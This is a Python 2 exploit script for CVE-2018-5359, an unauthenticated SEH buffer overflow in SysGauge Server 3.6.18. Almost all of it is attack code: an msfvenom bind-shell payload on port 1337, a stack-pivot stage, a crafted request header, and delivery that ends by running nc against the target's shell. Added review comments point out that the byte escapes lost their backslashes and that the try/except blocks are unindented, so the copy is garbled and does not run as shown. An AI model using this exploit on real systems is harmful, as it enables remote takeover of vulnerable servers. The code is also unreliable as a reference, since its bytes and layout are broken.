# Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz
# Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Exploit Author: Ahmad Mahfouz
# Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2018-5359
# Version: 3.6.18
# Tested on: Windows 7 x64
# Software Link: hhttp://www.sysgauge.com/setups/sysgaugesrv_setup_v3.6.18.exe



from struct import pack
from os import system
from sys import exit
from time import sleep
import socket



# --- Target parameters -------------------------------------------------------
# Hard-coded lab values. TCP 9221 is the only protocol fact this script states
# about the listener; the host is a private test address.
port = 9221
host = '192.168.72.231'


# --- Stage 1: stack adjustment after the SEH handler gains control -----------
# NOTE(review): throughout this copy the byte escapes appear to have lost their
# backslashes in transcription ("x83xc4x7f" is plain ASCII as written), so
# len() of every literal below differs from what the layout comments assume;
# the metasm/msfvenom annotations describe the author's intent, not the bytes
# actually present on this page.
stage1 = "x83xc4x7f" *16 # metasm > add esp,127
stage1 += "x83xc4x04" # metasm > add esp,4
stage1 += "xffxe4" # metasm > jmp esp
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b 'x02'

# --- Stage 2: generator output from the msfvenom line above ------------------
# Opaque encoded bytes; the only facts stated about them are the payload name
# (a bind shell) and the listening port (1337). Not reviewed byte by byte.
buf = ""
buf += "xb8x01x69xedx6fxddxc3xd9x74x24xf4x5ax31"
buf += "xc9xb1x53x31x42x12x83xeaxfcx03x43x67x0f"
buf += "x9axbfx9fx4dx65x3fx60x32xefxdax51x72x8b"
buf += "xafxc2x42xdfxfdxeex29x8dx15x64x5fx1ax1a"
buf += "xcdxeax7cx15xcex47xbcx34x4cx9ax91x96x6d"
buf += "x55xe4xd7xaax88x05x85x63xc6xb8x39x07x92"
buf += "x00xb2x5bx32x01x27x2bx35x20xf6x27x6cxe2"
buf += "xf9xe4x04xabxe1xe9x21x65x9axdaxdex74x4a"
buf += "x13x1exdaxb3x9bxedx22xf4x1cx0ex51x0cx5f"
buf += "xb3x62xcbx1dx6fxe6xcfx86xe4x50x2bx36x28"
buf += "x06xb8x34x85x4cxe6x58x18x80x9dx65x91x27"
buf += "x71xecxe1x03x55xb4xb2x2axccx10x14x52x0e"
buf += "xfbxc9xf6x45x16x1dx8bx04x7fxd2xa6xb6x7f"
buf += "x7cxb0xc5x4dx23x6ax41xfexacxb4x96x01x87"
buf += "x01x08xfcx28x72x01x3bx7cx22x39xeaxfdxa9"
buf += "xb9x13x28x47xb1xb2x83x7ax3cx04x74x3bxee"
buf += "xedx9exb4xd1x0exa1x1ex7axa6x5cxa1x81x0e"
buf += "xe8x47xe3x60xbcxd0x9bx42x9bxe8x3cxbcxc9"
buf += "x40xaaxf5x1bx56xd5x05x0exf0x41x8ex5dxc4"
buf += "x70x91x4bx6cxe5x06x01xfdx44xb6x16xd4x3e"
buf += "x5bx84xb3xbex12xb5x6bxe9x73x0bx62x7fx6e"
buf += "x32xdcx9dx73xa2x27x25xa8x17xa9xa4x3dx23"
buf += "x8dxb6xfbxacx89xe2x53xfbx47x5cx12x55x26"
buf += "x36xccx0axe0xdex89x60x33x98x95xacxc5x44"
buf += "x27x19x90x7bx88xcdx14x04xf4x6dxdaxdfxbc"
buf += "x9ex91x7dx94x36x7cx14xa4x5ax7fxc3xebx62"
buf += "xfcxe1x93x90x1cx80x96xddx9ax79xebx4ex4f"
buf += "x7dx58x6ex5a"

shellcode = buf

# --- Overflow buffer layout (per the author's inline annotations) ------------
# 124 bytes of filler reach the SEH record: a short jump over the handler
# pointer, then the handler address repeated four times, then stage1, then NOP
# padding up to a fixed 1000-byte body, then the shellcode. The class of bug
# this relies on is the absence of a bound on the body length the service
# accepts from an unauthenticated client (see the file header description).
payload = 'A' * 124 #offset
payload += 'xebx12x90x90' #jmp over seh retrun value
payload += 'x3bx38x01x10' * 4 # 0x1001383b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libdsm.dll]
payload += stage1
# NOTE(review): no check that the two lengths fit in 1000 bytes; if they do not,
# the multiplier is negative and this line silently adds nothing, so the final
# body is larger than 1000 bytes and the layout above no longer holds.
payload += 'x90' * (1000 - len(payload) - len(shellcode))
payload += shellcode


# --- Request header ----------------------------------------------------------
# Four constant bytes, two fixed dwords, then the body length twice as
# little-endian uint32 and finally the numeric value of the last body byte.
# The length fields are whatever this script declares — presumably the server
# trusts them when sizing its copy; confirm against the binary. From a
# detection standpoint, the constant prefix plus a declared length of this
# magnitude on TCP 9221 is the part of the request the sender cannot vary;
# legitimate request sizes are not visible from this script.
header = 'x75x19xbaxab'
header += 'x03x00x00x00'
header += 'x00x40x00x00'
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload


# --- Delivery ----------------------------------------------------------------
# NOTE(review): Python 2 syntax throughout (print statements, str used as a
# byte buffer). The bodies of the try/except below are not indented in this
# copy, so the file does not parse as shown.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

print "[*] Testing connection to tatget %s:%s" %(host,port)
s.connect((host, port))

# NOTE(review): bare except catches everything, including KeyboardInterrupt,
# not just connection failures; the socket is never closed on either path.
except:

print "[-] Unable to communicate to target %s:%s" %(host,port)
exit()



# socket.send() may transmit fewer bytes than len(packet); the return value
# is discarded, so a short write would go unnoticed.
s.send(packet)

print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:1337 .." %host
# Fixed delay before the follow-up connection; no readiness check is made.
sleep(3)
# Hands off to an external nc process through os.system(), i.e. a shell
# string with host interpolated into it.
system("nc %s 1337"%host)